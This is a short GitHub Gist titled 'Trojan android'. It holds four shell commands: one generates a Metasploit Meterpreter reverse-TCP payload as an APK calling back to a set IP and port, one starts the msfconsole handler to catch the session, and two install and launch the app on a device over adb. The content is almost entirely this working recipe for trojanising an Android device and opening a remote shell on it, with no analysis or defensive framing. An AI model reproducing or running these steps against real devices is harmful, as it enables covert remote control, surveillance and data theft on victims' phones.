Created
November 14, 2019 14:21
-
-
Save castexyz/8643dc5ce74180df27695b61c5a78c25 to your computer and use it in GitHub Desktop.
Trojan android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.6 LPORT=4444 -o msf.apk | |
msfconsole -qx "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set ExitOnSession false; exploit -j -z" | |
adb install msf.apk | |
adb shell am start -n com.metasploit.stage/.MainActivity |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment